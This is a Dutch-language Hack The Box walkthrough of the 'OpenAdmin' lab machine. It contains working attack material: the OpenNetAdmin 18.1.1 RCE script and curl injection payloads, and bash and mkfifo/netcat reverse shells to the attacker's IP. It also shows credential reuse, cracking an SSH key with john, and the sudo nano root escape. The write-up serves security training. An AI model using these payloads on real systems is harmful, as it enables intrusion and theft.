Zoals altijd beginnen we met een nmap scan
┌─[puck@parrot-lt]─[~/htb/openadmin] └──╼ $nmap -sC -sV 10.10.10.171 -oN allports.nmap Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-05 08:23 CEST Nmap scan report for 10.10.10.171 Host is up (0.090s latency). Not shown: 998 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA) | 256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA) |_ 256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-title: Apache2 Ubuntu Default Page: It works |_http-server-header: Apache/2.4.29 (Ubuntu) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 17.25 seconds ┌─[puck@parrot-lt]─[~/htb/openadmin]
┌─[puck@parrot-lt]─[~/htb/openadmin] └──╼ $ffuf -u http://10.10.10.171/FUZZ -w /usr/share/wordlists/dirb/common.txt /'___\ /'___\ /'___\ /\ \__/ /\ \__/ __ __ /\ \__/ \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\ \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/ \ \_\ \ \_\ \ \____/ \ \_\ \/_/ \/_/ \/___/ \/_/ v1.3.1-dev ________________________________________________ :: Method : GET :: URL : http://10.10.10.171/FUZZ :: Wordlist : FUZZ: /usr/share/wordlists/dirb/common.txt :: Follow redirects : false :: Calibration : false :: Timeout : 10 :: Threads : 40 :: Matcher : Response status: 200,204,301,302,307,401,403,405,500 ________________________________________________ .htaccess [Status: 403, Size: 277, Words: 20, Lines: 10, Duration: 95ms] .htpasswd [Status: 403, Size: 277, Words: 20, Lines: 10, Duration: 101ms] .hta [Status: 403, Size: 277, Words: 20, Lines: 10, Duration: 102ms] artwork [Status: 301, Size: 314, Words: 20, Lines: 10, Duration: 89ms] [Status: 200, Size: 10918, Words: 3499, Lines: 376, Duration: 3530ms] index.html [Status: 200, Size: 10918, Words: 3499, Lines: 376, Duration: 112ms] music [Status: 301, Size: 312, Words: 20, Lines: 10, Duration: 102ms] server-status [Status: 403, Size: 277, Words: 20, Lines: 10, Duration: 106ms] :: Progress: [4614/4614] :: Job [1/1] :: 391 req/sec :: Duration: [0:00:14] :: Errors: 0 :: ┌─[puck@parrot-lt]─[~/htb/openadmin]
Ik begon me te concentreren op twee mappen, ONA en muziek. Ik opende de http: //openadmin.htb/ona die me een webpagina bracht. Dit is het OpenNetAdmin-configuratiescherm. De OpenNetAdmin is een opensource IP Address Management (IPAM) -systeem.
Een waarschuwing op de startpagina geeft aan dat de versie van de app 18.1.1 is. Een snelle blik op kwetsbaarheden van versie 18.1.1 op Google, laat zien dat de huidige versie kwetsbaar is voor RCE (uitvoering van externe code). Dus op dit punt begrepen we dat dit vak het slachtoffer is van recent ontdekte exploit.
The ExploitDB listed two exploits, a Metasploit module, and a bash script.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
|
# Exploit Title: OpenNetAdmin 18.1.1 – Remote Code Execution
# Date: 2019-11-19
# Exploit Author: mattpascoe
# Vendor Homepage: http://opennetadmin.com/
# Software Link: https://github.com/opennetadmin/ona
# Version: v18.1.1
# Tested on: Linux
# Exploit Title: OpenNetAdmin v18.1.1 RCE
# Date: 2019-11-19
# Exploit Author: mattpascoe
# Vendor Homepage: http://opennetadmin.com/
# Software Link: https://github.com/opennetadmin/ona
# Version: v18.1.1
# Tested on: Linux
#!/bin/bash
URL=“${1}”
while true;do
echo –n “$ “; read cmd
curl —silent –d “xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \”BEGIN\”;${cmd};echo \”END\”&xajaxargs[]=ping” “${URL}” | sed –n –e ‘/BEGIN/,/END/ p’ | tail –n +2 | head –n –1
done
|
ik download het script gewoon naar mijn OpenAdmin-werkmap en voer het script uit. Het script gaf me meteen een shell als www-data.
┌─[puck@parrot-lt]─[~/htb/openadmin] └──╼ $curl -s -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;id&xajaxargs[]=ping" http://10.10.10.171/ona/ | html2text <?xml version="1.0" encoding="utf-8" ?> CDATA[removeElement('tooltips_results');]]> CDATA[div]]> CDATA[initialize_window('tooltips_results');el ('tooltips_results').style.display = 'none';el ('tooltips_results').style.visibility = 'hidden';el('tooltips_results').onclick = function(ev) { focus_window(this.id); };]]> CDATA[ Ping Results [/ona/images/icon_close.gif] uid=33(www-data) gid=33(www-data) groups=33(www-data) [Unknown INPUT type] ]]> CDATA[toggle_window('tooltips_results');]]> ┌─[puck@parrot-lt]─[~/htb/openadmin]
┌─[puck@parrot-lt]─[~/htb/openadmin] └──╼ $curl -s -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;bash -c 'bash -i >%26 /dev/tcp/10.10.14.3/443 0>%261'&xajaxargs[]=ping" http://10.10.10.171/ona/
en pak de shell
┌─[✗]─[puck@parrot-lt]─[~/htb/openadmin] └──╼ $sudo nc -nlvp 443 listening on [any] 443 ... connect to [10.10.14.3] from (UNKNOWN) [10.10.10.171] 54102 bash: cannot set terminal process group (1237): Inappropriate ioctl for device bash: no job control in this shell www-data@openadmin:/opt/ona/www$ id id uid=33(www-data) gid=33(www-data) groups=33(www-data) www-data@openadmin:/opt/ona/www$
Omdat de www-data van de gebruiker een gebruiker met weinig rechten is, kunnen we geen grote taken uitvoeren. Dus moeten we zijn privilege escaleren naar de volgende grote gebruiker.
Je kan natuurlijk ook lekker Burpen, zoals hieronder
en dan een Netcat reverse Shell zonder nc -e gebruiken
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.70 443 >/tmp/f
Natuurlijk wel eerst even url encoden CTRL-u in Burp.
Eerst moeten we de gebruikers in vinden. laten we cat / etc / passw gebruiken
te vinden
-knip- jimmy:x:1000:1000:jimmy:/home/jimmy:/bin/bash mysql:x:111:114:MySQL Server,,,:/nonexistent:/bin/false joanna:x:1001:1001:,,,:/home/joanna:/bin/bash
We hebben dus een aantal gebruikers in dit vak gevonden, maar ik weet niet zeker met welke ik hierboven moet beginnen om het privilege te krijgen. laten we beginnen met het opsommen van het vak op zoek naar hints.
Na een tijdje vond ik een PHP-bestand met de naam “database_settings.inc.php” in de map; / Opt / ona / www / local / config /. Het bestand heeft MySQL-databasereferenties.
www-data@openadmin:/opt/ona/www$ cat /opt/ona/www/local/config/database_settings.inc.php </opt/ona/www/local/config/database_settings.inc.php <?php $ona_contexts=array ( 'DEFAULT' => array ( 'databases' => array ( 0 => array ( 'db_type' => 'mysqli', 'db_host' => 'localhost', 'db_login' => 'ona_sys', 'db_passwd' => 'n1nj4W4rri0R!', 'db_database' => 'ona_default', 'db_debug' => false, ), ), 'description' => 'Default data context', 'context_color' => '#D3DBFF', ), ); ?>www-data@openadmin:/opt/ona/www$
PRIVILEGE ESCALATIE
Terwijl de SSH liep, probeerde ik de doos als jimmy, gelukkig werkte het.
root@kali:~/htb# ssh jimmy@10.10.10.171 The authenticity of host '10.10.10.171 (10.10.10.171)' can't be established. ECDSA key fingerprint is SHA256:loIRDdkV6Zb9r8OMF3jSDMW3MnV5lHgn4wIRq+vmBJY. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '10.10.10.171' (ECDSA) to the list of known hosts. jimmy@10.10.10.171's password: n1nj4W4rri0R! Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage System information as of Wed Jan 8 12:44:49 UTC 2020 System load: 1.25 Processes: 147 Usage of /: 49.1% of 7.81GB Users logged in: 1 Memory usage: 31% IP address for ens160: 10.10.10.171 Swap usage: 0% * Canonical Livepatch is available for installation. - Reduce system reboots and improve kernel security. Activate at: https://ubuntu.com/livepatch 41 packages can be updated. 12 updates are security updates. Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings Last login: Wed Jan 8 12:25:57 2020 from 10.10.14.11 jimmy@openadmin:~$ ls jimmy@openadmin:~$ id uid=1000(jimmy) gid=1000(jimmy) groups=1000(jimmy),1002(internal)
Na een tijdje is echter vastgesteld dat deze gebruiker geen gebruikersvlag heeft, dus laten we doorgaan met het opsommen van meer. De www-map van de gebruiker heeft een speciale map met de naam ‘intern’ die bevat,
jimmy@openadmin:/var/www/internal$ ls -la total 20 drwxrwx--- 2 jimmy internal 4096 Nov 23 17:43 . drwxr-xr-x 4 root root 4096 Nov 22 18:15 .. -rwxrwxr-x 1 jimmy internal 3229 Nov 22 23:24 index.php -rwxrwxr-x 1 jimmy internal 185 Nov 23 16:37 logout.php -rwxrwxr-x 1 jimmy internal 339 Nov 23 17:40 main.php jimmy@openadmin:/var/www/internal$ cat main.php <?php session_start(); if (!isset ($_SESSION['username'])) { header("Location: /index.php"); }; # Open Admin Trusted # OpenAdmin $output = shell_exec('cat /home/joanna/.ssh/id_rsa'); echo "<pre>$output</pre>"; ?> <html> <h3>Don't forget your "ninja" password</h3> Click here to logout <a href="logout.php" tite = "Logout">Session </html> jimmy@openadmin:/var/www/internal$
jimmy@openadmin:/var/www/internal$ curl http://127.0.0.1/main.php <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL was not found on this server.</p> <hr> <address>Apache/2.4.29 (Ubuntu) Server at 127.0.0.1 Port 80</address> </body></html> jimmy@openadmin:/var/www/internal$
jimmy@openadmin:/var/www/internal$ netstat -tulpn (Not all processes could be identified, non-owned process info will not be shown, you would have to be root to see it all.) Active Internet connections (only servers) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN - tcp 0 0 127.0.0.1:52846 0.0.0.0:* LISTEN - tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN - tcp6 0 0 :::80 :::* LISTEN - tcp6 0 0 :::22 :::* LISTEN - udp 0 0 127.0.0.53:53 0.0.0.0:* - jimmy@openadmin:/var/www/internal$
jimmy@openadmin:/var/www/internal$ curl http://127.0.0.1:52846/main.php <pre>-----BEGIN RSA PRIVATE KEY----- Proc-Type: 4,ENCRYPTED DEK-Info: AES-128-CBC,2AF25344B8391A25A9B318F3FD767D6D kG0UYIcGyaxupjQqaS2e1HqbhwRLlNctW2HfJeaKUjWZH4usiD9AtTnIKVUOpZN8 ad/StMWJ+MkQ5MnAMJglQeUbRxcBP6++Hh251jMcg8ygYcx1UMD03ZjaRuwcf0YO ShNbbx8Euvr2agjbF+ytimDyWhoJXU+UpTD58L+SIsZzal9U8f+Txhgq9K2KQHBE 6xaubNKhDJKs/6YJVEHtYyFbYSbtYt4lsoAyM8w+pTPVa3LRWnGykVR5g79b7lsJ ZnEPK07fJk8JCdb0wPnLNy9LsyNxXRfV3tX4MRcjOXYZnG2Gv8KEIeIXzNiD5/Du y8byJ/3I3/EsqHphIHgD3UfvHy9naXc/nLUup7s0+WAZ4AUx/MJnJV2nN8o69JyI 9z7V9E4q/aKCh/xpJmYLj7AmdVd4DlO0ByVdy0SJkRXFaAiSVNQJY8hRHzSS7+k4 piC96HnJU+Z8+1XbvzR93Wd3klRMO7EesIQ5KKNNU8PpT+0lv/dEVEppvIDE/8h/ /U1cPvX9Aci0EUys3naB6pVW8i/IY9B6Dx6W4JnnSUFsyhR63WNusk9QgvkiTikH 40ZNca5xHPij8hvUR2v5jGM/8bvr/7QtJFRCmMkYp7FMUB0sQ1NLhCjTTVAFN/AZ fnWkJ5u+To0qzuPBWGpZsoZx5AbA4Xi00pqqekeLAli95mKKPecjUgpm+wsx8epb 9FtpP4aNR8LYlpKSDiiYzNiXEMQiJ9MSk9na10B5FFPsjr+yYEfMylPgogDpES80 X1VZ+N7S8ZP+7djB22vQ+/pUQap3PdXEpg3v6S4bfXkYKvFkcocqs8IivdK1+UFg S33lgrCM4/ZjXYP2bpuE5v6dPq+hZvnmKkzcmT1C7YwK1XEyBan8flvIey/ur/4F FnonsEl16TZvolSt9RH/19B7wfUHXXCyp9sG8iJGklZvteiJDG45A4eHhz8hxSzh Th5w5guPynFv610HJ6wcNVz2MyJsmTyi8WuVxZs8wxrH9kEzXYD/GtPmcviGCexa RTKYbgVn4WkJQYncyC0R1Gv3O8bEigX4SYKqIitMDnixjM6xU0URbnT1+8VdQH7Z uhJVn1fzdRKZhWWlT+d+oqIiSrvd6nWhttoJrjrAQ7YWGAm2MBdGA/MxlYJ9FNDr 1kxuSODQNGtGnWZPieLvDkwotqZKzdOg7fimGRWiRv6yXo5ps3EJFuSU1fSCv2q2 XGdfc8ObLC7s3KZwkYjG82tjMZU+P5PifJh6N0PqpxUCxDqAfY+RzcTcM/SLhS79 yPzCZH8uWIrjaNaZmDSPC/z+bWWJKuu4Y1GCXCqkWvwuaGmYeEnXDOxGupUchkrM +4R21WQ+eSaULd2PDzLClmYrplnpmbD7C7/ee6KDTl7JMdV25DM9a16JYOneRtMt qlNgzj0Na4ZNMyRAHEl1SF8a72umGO2xLWebDoYf5VSSSZYtCNJdwt3lF7I8+adt z0glMMmjR2L5c2HdlTUt5MgiY8+qkHlsL6M91c4diJoEXVh+8YpblAoogOHHBlQe K1I1cqiDbVE/bmiERK+G4rqa0t7VQN6t2VWetWrGb+Ahw/iMKhpITWLWApA3k9EN -----END RSA PRIVATE KEY----- </pre><html> <h3>Don't forget your "ninja" password</h3> Click here to logout <a href="logout.php" tite = "Logout">Session </html> jimmy@openadmin:/var/www/internal$
root@kali:~/htb/openadmin# python sshng2john.py id_rsa > id_rsa_encrypted
root@kali:~/htb/openadmin# john id_rsa_encrypted --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:05 37.30% (ETA: 11:49:29) 0g/s 1095Kp/s 1095Kc/s 1095KC/s misscohen..missclowy-14
bloodninjas (id_rsa)
Warning: Only 1 candidate left, minimum 2 needed for performance.
1g 0:00:00:13 DONE (2020-01-08 11:49) 0.07570g/s 1085Kp/s 1085Kc/s 1085KC/s *7¡Vamos!
Session completed
root@kali:~/htb/openadmin# ssh -i id_rsa joanna@10.10.10.171 Enter passphrase for key 'id_rsa': bloodninjas Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage System information as of Thu Jan 9 15:12:18 UTC 2020 System load: 1.08 Processes: 136 Usage of /: 49.0% of 7.81GB Users logged in: 1 Memory usage: 30% IP address for ens160: 10.10.10.171 Swap usage: 0% * Canonical Livepatch is available for installation. - Reduce system reboots and improve kernel security. Activate at: https://ubuntu.com/livepatch 41 packages can be updated. 12 updates are security updates. Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings Last login: Thu Jan 9 09:46:48 2020 from 10.10.16.70 joanna@openadmin:~$ cat user.txt c9b2cf07d40807e62af62660f0c81b5f joanna@openadmin:~$
ROOT verkrijgen
Procedure 1: de root-vlag van nano verkrijgen:
De opdracht sudo -l onthulde dat de gebruiker Joanna bin / nano / opt / priv als root zonder wachtwoord kan uitvoeren. Als je ziet dat de gebruiker nano als root kan uitvoeren, is dit het eenvoudigste om te exploiteren. Slechts 3 commando’s en de doos is van jou.
voer uit:
joanna@openadmin:~$ sudo /bin/nano /opt/priv
gtfobins has a page on nano. The path to get shell from sudo
is as follows:
sudo nano
^R^X
reset; sh 1>&0 2>&0
This will give you a root shell 🙂
Dat is het. bedankt voor het lezen.